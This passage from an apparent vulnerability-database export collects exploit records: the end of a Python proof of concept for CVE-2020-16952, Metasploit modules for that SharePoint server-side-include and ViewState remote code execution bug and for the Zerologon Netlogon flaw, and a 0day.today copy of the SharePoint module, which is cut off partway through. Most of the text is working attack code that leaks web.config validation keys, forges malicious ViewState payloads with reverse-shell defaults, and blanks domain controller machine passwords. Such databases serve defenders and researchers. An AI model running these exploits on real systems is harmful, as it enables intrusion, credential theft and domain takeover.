SPDataSourceMode.List)\r\n {\r\n string text2 = (string)this.ParameterValues.Collection[\"dvt_form_key\"];\r\n text3 = text2;\r\n }\r\n else\r\n {\r\n text3 = spdataSource.ListItemID.ToString(CultureInfo.InvariantCulture);\r\n }\r\n if (text3 != null)\r\n {\r\n if (this.FormContexts.ContainsKey(text3))\r\n {\r\n spcontext = this.FormContexts[text3];\r\n }\r\n else\r\n {\r\n spcontext = SPContext.GetContext(this.Context, text3, ((IListWebPart)this).ListId, this.CurrentWeb);\r\n this.FormContexts[text3] = spcontext;\r\n }\r\n }\r\n }\r\n foreach (object obj in control.Controls)\r\n {\r\n Control control2 = (Control)obj;\r\n this.RecursivelyAddFormFieldContext(control2, spcontext);\r\n }\r\n if (spcontext != null && spdataSource != null)\r\n {\r\n spdataSource.ItemContext = spcontext;\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(control); // 5\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(control);\r\n }\r\n using (IEnumerator enumerator2 = control.Controls.GetEnumerator())\r\n {\r\n while (enumerator2.MoveNext())\r\n {\r\n object obj2 = enumerator2.Current;\r\n Control control3 = (Control)obj2;\r\n this.RecursivelyProcessChildFormControls(control3);\r\n }\r\n goto IL_632;\r\n }\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n if (this._listView != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this._listView);\r\n }\r\n else\r\n {\r\n Literal literal = new Literal();\r\n literal.Text = this._partContent;\r\n updatePanel.ContentTemplateContainer.Controls.Add(literal);\r\n }\r\n }\r\n else if (this._listView != null)\r\n {\r\n this.AddParsedSubObject(this._listView);\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(new Literal\r\n {\r\n Text = this._partContent\r\n });\r\n }\r\n IL_632:\r\n this.RemoveViewStateIfEmpty(\"ParamValues\");\r\n this.RemoveViewStateIfEmpty(\"FilterOperations\");\r\n this.RemoveViewStateIfEmpty(\"IntermediateFormActions\");\r\n 
this.RemoveViewStateIfEmpty(\"OriginalValues\");\r\n this._partContent = null;\r\n this._listView = null;\r\n }\r\n this._asyncDelayed = false;\r\n }\r\n```\r\n\r\nAt *[1]*, the code performs a databind and accesses the data from the datasource (in this case it's our controlled serverside http header). The data returned must be valid xml so that it can be processed via our crafted xslt. Then at *[2]* the code calls `DataFormWebPart.RunatChecker.IsMatch` on our controlled `_partContent`. This checks for an instance of `runat=server` in the supplied xml. However, we can't put that in there because we can't register any prefixes (registration is probably not possible due to the <% not being a valid xml tag). But I found a way to pass the check by using HTML server controls which can include a `runat=server`.\r\n\r\nAt *[3]* the code calls `VerifyControlOnSafeList` with the false flag, meaning our input can use server-side includes. Lucky for us, includes are valid xml, so we can stuff them into our `_partContent` and later at *[4]* they are parsed and finally added to the page at *[5]*.\r\n\r\nThis allows an us to leak the complete `web.config` file, including the Validation Key which is enough to generate a malicious serialized viewState and trigger rce via deserialization.\r\n\r\n## Fingerprint:\r\n\r\nFor detecting vulnerable versions before exploitation, you can use this:\r\n\r\n```\r\nPUT /poc.aspx HTTP/1.1\r\nHost: [target]\r\nContent-Length: 67```\r\n\r\nThen https://[target]/poc.aspx should return 16.0.10364.20001.\r\n\r\n## Credit:\r\n\r\nSteven Seeley (mr_me) of Qihoo 360 Vulcan Team\r\n\r\n## Example:\r\n\r\nFor testing, download ysoserial.net and store it in a folder called `yss`.\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py\r\n(+) usage: ./poc.py(+) eg: ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### mspaint\r\n(+) eg: ./poc.py win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py win-3t816hj84n4 
harryh@pwn.me:user123### notepad\r\n(+) leaked validation key: 55AAE0A8E646746523FA5EE0675232BE39990CDAC3AE2B0772E32D71C05929D8\r\n(+) triggering rce, running 'cmd /c notepad'\r\n(+) done! rce achieved\r\n\"\"\"\r\nimport os\r\nimport re\r\nimport sys\r\nimport urllib3\r\nimport requests\r\nimport subprocess\r\nfrom platform import uname\r\nfrom requests_ntlm2 import HttpNtlmAuth\r\nfrom urllib.parse import urlparse\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\ndef put_page(target, domain, user, password):\r\n payload = \"\"\"\"\"\"\r\n r = requests.put(\"http://%s/poc.aspx\" % target, data=payload, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n assert (r.status_code == 200 or r.status_code == 201), \"(-) page creation failed, user doesn't have site ownership rights!\"\r\n\r\ndef get_vkey(target, domain, user, password):\r\n h = { \"360Vulcan\": \"\" }\r\n r = requests.get(\"http://%s/poc.aspx\" % target, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password), headers=h)\r\n match = re.search(\"machineKey validationKey=\\\"(.{64})\", r.text)\r\n assert match, \"(-) unable to leak the validation key, exploit failed!\"\r\n return match.group(1)\r\n\r\ndef trigger_rce(target, domain, path, user, password, cmd, key):\r\n out = subprocess.Popen([\r\n 'yss/ysoserial.exe', \r\n '-p', 'ViewState',\r\n '-g', 'TypeConfuseDelegate',\r\n '-c', '%s' % cmd,\r\n '--apppath=%s' % path,\r\n '--path=%s_layouts/15/zoombldr.aspx' % path,\r\n '--islegacy',\r\n '--validationalg=HMACSHA256',\r\n '--validationkey=%s' % key\r\n ], stdout=subprocess.PIPE)\r\n rce = { \"__VIEWSTATE\" : out.communicate()[0].decode() }\r\n requests.post(\"http://%s/_layouts/15/zoombldr.aspx\" % target, data=rce, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n\r\ndef main():\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s\" % sys.argv[0])\r\n print(\"(+) eg: %s win-3t816hj84n4 harryh@pwn.me:user123### mspaint\" % sys.argv[0])\r\n print(\"(+) 
eg: %s win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\" % sys.argv[0])\r\n sys.exit(-1)\r\n target = sys.argv[1]\r\n user = sys.argv[2].split(\":\")[0].split(\"@\")[0]\r\n password = sys.argv[2].split(\":\")[1]\r\n domain = sys.argv[2].split(\":\")[0].split(\"@\")[1]\r\n cmd = sys.argv[3]\r\n path = urlparse(\"http://%s\" % target).path or \"/\"\r\n path = path + \"/\" if not path.endswith(\"/\") else path\r\n put_page(target, domain, user, password)\r\n key = get_vkey(target, domain, user, password)\r\n print(\"(+) leaked validation key: %s\" % key)\r\n print(\"(+) triggering rce, running 'cmd /c %s'\" % cmd)\r\n trigger_rce(target, domain, path, user, password, cmd, key)\r\n print(\"(+) done! rce achieved\")\r\n\r\nif __name__ == '__main__':\r\n if \"microsoft\" not in uname()[2].lower():\r\n print(\"(-) WARNING - this was tested on wsl, so it may not work on other platforms\")\r\n if not os.path.exists('yss/ysoserial.exe'):\r\n print(\"(-) missing ysoserial.net!\")\r\n sys.exit(-1)\r\n main()", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://srcincite.io/pocs/cve-2020-16952.py.txt"}], "metasploit": [{"lastseen": "2022-06-24T08:38:31", "description": "This module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization. 
Tested against SharePoint 2019 on Windows Server 2016.\n", "cvss3": {}, "published": "2020-10-14T22:45:15", "type": "metasploit", "title": "Microsoft SharePoint Server-Side Include and ViewState RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2021-06-14T14:15:27", "id": "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_SSI_VIEWSTATE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/sharepoint_ssi_viewstate/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::Sharepoint\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 
'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def cookie\n datastore['COOKIE']\n end\n\n def vuln_builds\n # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates\n # https://buildnumbers.wordpress.com/sharepoint/\n [\n [Rex::Version.new('15.0.0.4571'), Rex::Version.new('15.0.0.5275')], # SharePoint 2013\n [Rex::Version.new('16.0.0.4351'), Rex::Version.new('16.0.0.5056')], # SharePoint 2016\n [Rex::Version.new('16.0.0.10337'), 
Rex::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n build = sharepoint_get_version('cookie' => cookie)\n\n if build.nil?\n return CheckCode::Unknown('Failed to retrieve the SharePoint version number')\n end\n\n if vuln_builds.any? { |build_range| build.between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n if (username.blank? && password.blank?)\n if cookie.blank?\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword or COOKIE are required for exploitation')\n end\n\n print_warning('Using the specified COOKIE for authentication')\n end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'headers' => {\n ssi_header => 
'<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract web.config from response')\n end\n\n print_good(\"Saved web.config to #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'partial' => true\n )\n\n unless res\n print_error(\"Target did not respond to #{__method__}\")\n return\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n sharepoint_execute_command_via_viewstate(cmd, @validation_key, { 'cookie' => cookie })\n end\n\n def ssi_page\n <<~XML\n <%@ Register Tagprefix=\"WebPartPages\" Namespace=\"Microsoft.SharePoint.WebPartPages\" Assembly=\"Microsoft.SharePoint, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n 
<xsl:template match=\"/\">\n <xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T18:07:00", "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account password to an empty string, which will then allow the attacker to authenticate as the machine account. After exploitation, it's important to restore this password to it's original value. 
Failure to do so can result in service instability.\n", "cvss3": {}, "published": "2020-09-17T18:28:53", "type": "metasploit", "title": "Netlogon Weak Cryptographic Authentication", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-03T14:32:38", "id": "MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Auxiliary::Report\n\n CheckCode = Exploit::CheckCode\n Netlogon = RubySMB::Dcerpc::Netlogon\n EMPTY_SHARED_SECRET = OpenSSL::Digest.digest('MD4', '')\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Netlogon Weak Cryptographic Authentication',\n 'Description' => %q{\n A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to its original value. 
Failure\n to do so can result in service instability.\n },\n 'Author' => [\n 'Tom Tervoort', # original vulnerability details\n 'Spencer McIntyre', # metasploit module\n 'Dirk-jan Mollema' # password restoration technique\n ],\n 'Notes' => {\n 'AKA' => ['Zerologon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]\n },\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'REMOVE', { 'Description' => 'Remove the machine account password' } ],\n [ 'RESTORE', { 'Description' => 'Restore the machine account password' } ]\n ],\n 'DefaultAction' => 'REMOVE',\n 'References' => [\n [ 'CVE', '2020-1472' ],\n [ 'URL', 'https://www.secura.com/blog/zero-logon' ],\n [ 'URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py' ],\n [ 'URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py' ]\n ]\n )\n )\n\n register_options(\n [\n OptPort.new('RPORT', [ false, 'The netlogon RPC port' ]),\n OptString.new('NBNAME', [ true, 'The server\\'s NetBIOS name' ]),\n OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),\n ]\n )\n end\n\n def peer\n \"#{rhost}:#{@dport || datastore['RPORT']}\"\n end\n\n def bind_to_netlogon_service\n @dport = datastore['RPORT']\n if @dport.nil? 
|| @dport == 0\n @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')\n fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport\n end\n\n # Bind to the service\n handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n end\n\n def check\n bind_to_netlogon_service\n\n status = nil\n 2000.times do\n netr_server_req_challenge\n response = netr_server_authenticate3\n\n break if (status = response.error_status) == 0\n\n windows_error = ::WindowsError::NTStatus.find_by_retval(response.error_status.to_i).first\n # Try again if the Failure is STATUS_ACCESS_DENIED, otherwise something has gone wrong\n next if windows_error == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED\n\n fail_with(Failure::UnexpectedReply, windows_error)\n end\n\n return CheckCode::Detected unless status == 0\n\n CheckCode::Vulnerable\n end\n\n def run\n case action.name\n when 'REMOVE'\n action_remove_password\n when 'RESTORE'\n action_restore_password\n end\n end\n\n def action_remove_password\n fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable\n\n print_good('Successfully authenticated')\n\n report_vuln(\n host: rhost,\n port: @dport,\n name: name,\n sname: 'dcerpc',\n proto: 'tcp',\n refs: references,\n info: \"Module #{fullname} successfully authenticated to the server without knowledge of the shared secret\"\n )\n\n response = netr_server_password_set2\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)\")\n end\n\n 
def action_restore_password\n fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']\n password = [datastore['PASSWORD']].pack('H*')\n\n bind_to_netlogon_service\n client_challenge = OpenSSL::Random.random_bytes(8)\n\n response = netr_server_req_challenge(client_challenge: client_challenge)\n session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)\n ppp = Netlogon.encrypt_credential(session_key, client_challenge)\n\n response = netr_server_authenticate3(client_credential: ppp)\n fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.error_status == 0\n\n new_password_data = (\"\\x00\" * (512 - password.length)) + password + [password.length].pack('V')\n response = netr_server_password_set2(\n authenticator: Netlogon::NetlogonAuthenticator.new(\n credential: Netlogon.encrypt_credential(session_key, [ppp.unpack1('Q') + 10].pack('Q')),\n timestamp: 10\n ),\n clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)\n )\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set machine account (#{datastore['NBNAME']}$) password\")\n end\n\n def netr_server_authenticate3(client_credential: \"\\x00\" * 8)\n nrpc_call('NetrServerAuthenticate3',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n client_credential: client_credential,\n flags: 0x212fffff)\n end\n\n def netr_server_password_set2(authenticator: nil, clear_new_password: \"\\x00\" * 516)\n authenticator ||= 
Netlogon::NetlogonAuthenticator.new(credential: \"\\x00\" * 8, timestamp: 0)\n nrpc_call('NetrServerPasswordSet2',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n authenticator: authenticator,\n clear_new_password: clear_new_password)\n end\n\n def netr_server_req_challenge(client_challenge: \"\\x00\" * 8)\n nrpc_call('NetrServerReqChallenge',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n computer_name: datastore['NBNAME'],\n client_challenge: client_challenge)\n end\n\n def nrpc_call(name, **kwargs)\n request = Netlogon.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n fail_with(Failure::UnexpectedReply, \"The #{name} Netlogon RPC request failed\")\n end\n\n Netlogon.const_get(\"#{name}Response\").read(raw_response)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-25T19:19:59", "description": "This Metasploit module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. 
The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdt", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "1337DAY-ID-35071", "href": "https://0day.today/exploit/description/35071", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::ViewState\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module 
exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n 
OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def vuln_builds\n [\n [Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013\n [Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016\n [Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # Hat tip @tsellers-r7\n #\n # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly\n unless (build_header = 